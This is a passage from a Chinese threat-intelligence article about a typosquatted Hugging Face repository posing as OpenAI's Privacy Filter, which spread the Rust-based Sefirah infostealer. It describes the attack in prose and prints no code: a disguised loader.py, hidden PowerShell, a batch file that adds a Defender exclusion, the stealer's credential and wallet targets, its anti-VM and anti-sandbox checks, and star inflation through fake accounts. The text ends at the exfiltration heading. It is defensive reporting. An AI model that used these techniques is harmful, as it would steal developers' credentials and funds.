<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8322e7f3&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518784%26idx%3D1%26sn%3D16b5fe101414c690ae21f811f931791d">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 12 May 2026 09:37:00 +0800</pubDate>
    </item>
    <item>
      <title>Hugging Face惊现供应链投毒：仿冒OpenAI仓库窃取开发者敏感数据</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518656&amp;idx=1&amp;sn=86b04c00b27101115ddbf8aa955ba6b5</link>
      <description>2026年5月7日，安全研究机构 HiddenLayer 披露了一起针对 AI 开发社区的供应链投毒攻击事件。攻击者在 Hugging Face 平台创建恶意仓库 Open-OSS/privacy-filter，通过 typosquatting 技术冒充 OpenAI 官方 &#34;Privacy Filter&#34; 项目，成功进入平台趋势榜榜首位置</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-05-11 10:36</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=f70619e7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq9Rp8WFv2sIHZZg2qDcUxArG6OyTlXK9SKWUzTZvopBznwEoWldARo9SITFx1NzALrudk3LDSnMNggqjM7UdZgWKSeXRBHMXhQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年5月7日，安全研究机构 HiddenLayer 披露了一起针对 AI 开发社区的供应链投毒攻击事件。攻击者在 Hugging Face 平台创建恶意仓库 Open-OSS/privacy-filter，通过 typosquatting 技术冒充 OpenAI 官方 "Privacy Filter" 项目，成功进入平台趋势榜榜首位置</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">事件概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2026年5月7日，安全研究机构 HiddenLayer 披露了一起针对 AI 开发社区的供应链投毒攻击事件。攻击者在 Hugging Face 平台创建恶意仓库 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Open-OSS/privacy-filter</span></strong><span leaf="">，通过 typosquatting 技术冒充 OpenAI 官方 &#34;Privacy Filter&#34; 项目，成功进入平台趋势榜榜首位置。该仓库在被清除前累计获得约 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">244,000 次下载</span></strong><span leaf="">，成为开源 AI 平台历史上最严重的大规模恶意软件分发事件之一。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">此次攻击的核心 payload 为基于 Rust 语言开发的 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Sefirah</span></strong><span leaf=""> 信息窃取木马，具备完整的反分析能力和广泛的数据窃取范围。受害者的浏览器凭据、加密货币钱包、Discord 令牌、SSH/VPN 凭证等敏感数据均面临泄露风险。攻击活动与 npm 平台 typosquatting 攻击存在基础设施重叠，表明威胁行为体正在跨平台构建规模化攻击能力。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击技术分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">初始访问：Typosquatting 与信任滥用</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击者采用经典的 typosquatting 技术，在 Hugging Face 平台注册与合法项目名称高度相似的仓库名 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Open-OSS/privacy-filter</span></strong><span leaf="">，冒充 OpenAI 官方发布的 Privacy Filter 项目。攻击者几乎逐字复制了原始项目的模型卡片（Model Card）内容，使用虚假但看似可信的项目文档建立欺骗性。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击者进一步通过自动化脚本生成大量虚假账户，对恶意仓库进行 &#34;star&#34; 操作，人为提升其在趋势榜单的排名。在社交工程手段的推动下，该仓库短暂登上 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">趋势榜榜首</span></strong><span leaf="">，借助平台公信力进一步扩大传播范围。研究人员分析发现，约 667 个点赞账户中的绝大多数为自动生成的虚假账户，用于制造社区认可的假象。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">感染链：多阶段 Payload 投递</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">恶意仓库采用四阶段感染链完成初始访问到最终 payload 部署的全过程。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第一阶段：loader.py</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">仓库中的 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">loader.py</span></code><span leaf=""> 文件被设计为看起来像正常的 AI 相关代码，但实际执行以下恶意行为：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">禁用 SSL 证书验证，绕过安全连接保护</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">从远程服务器获取 base64 编码的 URL</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">解码后访问外部资源获取 JSON 格式的 PowerShell 命令</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第二阶段：PowerShell 命令执行</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">解码后的 PowerShell 命令在隐藏窗口中执行，下载批处理文件 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">start.bat</span></strong><span leaf=""> 并执行权限提升操作。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第三阶段：start.bat</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该批处理文件完成以下关键步骤：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">静默添加最终 payload 到 Microsoft Defender 排除列表</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">下载最终有效载荷 sefirah</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">以提升的权限执行窃密木马</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第四阶段：Sefirah 窃密木马</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">最终 payload 为基于 Rust 语言编译的 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Sefirah</span></strong><span leaf=""> 信息窃取器，具备以下数据窃取能力：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">目标类别</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">具体数据类型</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">浏览器数据</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Chromium/Gecko 内核浏览器的 Cookie、保存的密码、加密密钥、浏览历史、会话令牌</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">即时通讯</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Discord 令牌、本地数据库、主密钥</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">加密货币</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">加密货币钱包及浏览器扩展</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">远程访问</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">SSH、FTP、VPN 凭证及配置文件（含 FileZilla）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">敏感文件</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">本地敏感文件及钱包种子/密钥</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">系统信息</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">完整系统信息、屏幕截图</span></p></td></tr></tbody></table><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">反分析机制</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Sefirah 恶意软件集成多层反分析能力，用于规避安全研究人员和自动化分析系统的检测：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">虚拟机检测</span></b><span leaf="">：识别 VMware、VirtualBox、QEMU 等虚拟化环境</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">沙箱检测</span></b><span leaf="">：识别主流沙箱平台的行为特征</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">调试器检测</span></b><span leaf="">：检测调试器附加行为和断点设置</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><b style="overflow-wrap: break-word;"><span leaf="">分析工具检测</span></b><span leaf="">：识别 Wireshark、Procmon 等分析工具的运行状态</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该恶意软件仅在确认为真实受害者环境后才会完整执行恶意行为，这种选择性执行策略显著增加了安全分析的难度。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">数据外泄</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, 